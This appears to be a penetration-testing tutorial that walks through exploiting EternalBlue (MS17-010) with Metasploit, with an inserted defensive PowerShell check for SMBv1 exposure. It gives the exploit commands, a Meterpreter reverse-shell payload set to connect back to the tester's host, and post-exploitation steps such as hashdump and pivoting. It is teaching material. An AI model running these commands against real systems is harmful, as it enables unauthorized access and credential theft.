In the world of cybersecurity, penetration testing is a critical practice to identify vulnerabilities and strengthen an organization's defense. One of the most crucial and exciting stages of a penetration test is the Exploitation Phase.
The Exploitation Phase is where a penetration tester (pentester) takes the vulnerabilities discovered during earlier phases, such as scanning and enumeration, and attempts to exploit them. The goal is to gain unauthorized access, escalate privileges, or take control of systems, essentially demonstrating what a real attacker could achieve.
Exploitation can range from gaining a foothold on a network to full system compromise, depending on the vulnerabilities discovered. However, unlike malicious hackers, penetration testers must carefully document the process to ensure systems aren't irreparably damaged.
One of the most popular tools for exploitation is Metasploit. It's a powerful open-source framework that helps pentesters automate the process of finding, exploiting, and testing vulnerabilities.
Let's walk through an example of using Metasploit to exploit a vulnerable system. We'll assume we've already completed scanning and identified a machine running an unpatched Microsoft SMB service (the MS17-010 vulnerability), which leaves it exposed to the well-known EternalBlue exploit.
Step 1: Fire Up Metasploit
Start by launching Metasploit. Open your terminal and type:
msfconsole
Metasploit will load, displaying its signature ASCII logo.
Step 2: Search for the Exploit
Since we know the system is vulnerable to EternalBlue (MS17-010), we can search for the relevant exploit module. Use the following command to search:
search ms17_010
Metasploit will return a list of matching modules. In this case, we are looking for exploit/windows/smb/ms17_010_eternalblue.
Step 3: Select the Exploit
Now, we’ll select the exploit by using:
use exploit/windows/smb/ms17_010_eternalblue
Step 4: Set Your Parameters
Before launching the exploit, you need to configure some options, such as the target IP address. Use the following command to set the target host:
set RHOSTS <target IP>
You may also need to specify the payload. Metasploit selects a default one, but let's set it explicitly to a Meterpreter reverse TCP shell:
set payload windows/x64/meterpreter/reverse_tcp
Next, set your local IP (the attacker's IP, which the reverse shell will connect back to):
set LHOST <your IP>
Step 5: Run the Exploit
Now that everything is set up, we can run the exploit:
exploit
If successful, you’ll see output indicating that the exploit has worked and a Meterpreter session has been opened.
If not successful, you'll see an error similar to mine (my machine isn't vulnerable to EternalBlue because I patched it).
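Since the demo host above was patched, here is how a defender confirms that state on a Windows machine. This is an added example, not code from the original post: it reports whether SMBv1 (the protocol EternalBlue targets) is still enabled and whether an MS17-010 hotfix is present. The KB list is assumed to be the set published with the MS17-010 bulletin; on current Windows 10/11 builds the fix ships inside cumulative updates, so an empty hotfix list alone does not prove the host is unpatched.

```powershell
# Added example (not from the original post): defender-side check for the
# MS17-010 / EternalBlue exposure discussed above. Run from an elevated prompt.
# Assumption: $Ms17010KBs lists the hotfix IDs published with the MS17-010
# bulletin; cumulative updates on newer builds supersede them.

function Test-Ms17010Exposure {
    [CmdletBinding()]
    param(
        [string[]]$Ms17010KBs = @('KB4012212','KB4012213','KB4012214','KB4012215','KB4012216',
                                  'KB4012217','KB4012598','KB4012606','KB4013198','KB4013429')
    )

    $report = [ordered]@{}

    # 1. SMBv1 server setting: EternalBlue only works against an SMBv1 listener.
    $smb = Get-SmbServerConfiguration -ErrorAction SilentlyContinue
    $report.SMB1ServerEnabled = if ($smb) { [bool]$smb.EnableSMB1Protocol } else { 'unknown' }

    # 2. Is the SMBv1 optional feature installed at all? Removing it is the cleanest mitigation.
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    $report.SMB1FeatureState = if ($feature) { $feature.State.ToString() } else { 'unknown' }

    # 3. Look for any of the MS17-010 hotfix IDs among installed updates.
    $found = Get-HotFix -ErrorAction SilentlyContinue |
             Where-Object { $Ms17010KBs -contains $_.HotFixID } |
             Select-Object -ExpandProperty HotFixID
    $report.Ms17010HotfixesFound = @($found)

    # Verdict: flag the host only if SMBv1 is actually serving and no hotfix was found.
    $report.LikelyExposed = ($report.SMB1ServerEnabled -eq $true) -and ($report.Ms17010HotfixesFound.Count -eq 0)
    $report.Recommendation = if ($report.SMB1ServerEnabled -eq $true) {
        'Disable SMBv1 (Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force) and confirm March 2017 or later updates are installed.'
    } else {
        'SMBv1 is off; EternalBlue cannot reach this host over SMBv1.'
    }

    [pscustomobject]$report
}

# Usage: print the findings for the local host.
Test-Ms17010Exposure | Format-List
```

On Windows Server the optional feature is exposed through Get-WindowsFeature FS-SMB1 instead, so SMB1FeatureState may read 'unknown' there while the SMB server setting is still checked.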
---
Step 6: Post-Exploitation
Once you’ve gained access, the next step is Post-Exploitation. In this phase, you may perform actions like:
Extracting Password Hashes:
hashdump
Capturing Screenshots:
screenshot
Pivoting to Other Machines: using Meterpreter's portfwd to route traffic through the compromised host.
Be Cautious: Ensure you understand the target system and avoid actions that might crash it.
Document Everything: Keep detailed notes of each step and command used, as this information will be crucial for your report.
Follow Rules of Engagement (RoE): Always stick to the scope of the penetration test to avoid legal or ethical issues.
Something I wish I had known about the exploitation phase is that there are different ways to exploit a vulnerability: for example, using Python or Ruby to write direct TCP requests to an SSH server to test out different passwords (or using a tool like Hydra). The Kali Linux organization has a large list and guide on using different tools, so I won't recreate those, but know that it's an option. Another good resource for finding exploit code is Exploit-DB. There is also a CLI tool called searchsploit.
The Exploitation Phase is where pentesters demonstrate the real-world impact of vulnerabilities. Using tools like Metasploit, pentesters can simulate attacks in a controlled environment, helping organizations understand and mitigate their security risks.
In our example, we exploited a vulnerable version of Microsoft SMB using the EternalBlue vulnerability. With Metasploit, we gained unauthorized access and launched a reverse shell, simulating the kind of breach a malicious actor could carry out. This is by no means an extensive guide, just a quick look at what a typical exploit may look like.
Remember, the goal of a penetration test is not to cause harm but to reveal weaknesses and help organizations better protect their systems.
If you have any questions about this process or want to dive deeper into specific post-exploitation techniques, feel free to reach out!